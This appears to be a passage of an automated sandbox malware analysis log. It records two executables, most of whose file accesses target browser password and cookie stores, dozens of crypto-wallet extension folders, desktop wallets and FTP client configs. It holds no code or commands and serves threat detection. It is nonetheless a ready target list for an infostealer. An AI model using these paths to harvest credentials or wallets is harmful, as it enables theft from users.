                            Source: AApUa7VQiy.exe, 00000000.00000003.1372532906.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                            Source: ktIplF5.exe, 0000000F.00000003.1955909943.0000000001239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.js
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\formhistory.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.json
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cert9.db
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIK
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIK
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeDirectory queried: C:\Users\user\Documents
                            Source: Yara matchFile source: 0000000F.00000003.1955909943.0000000001239000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
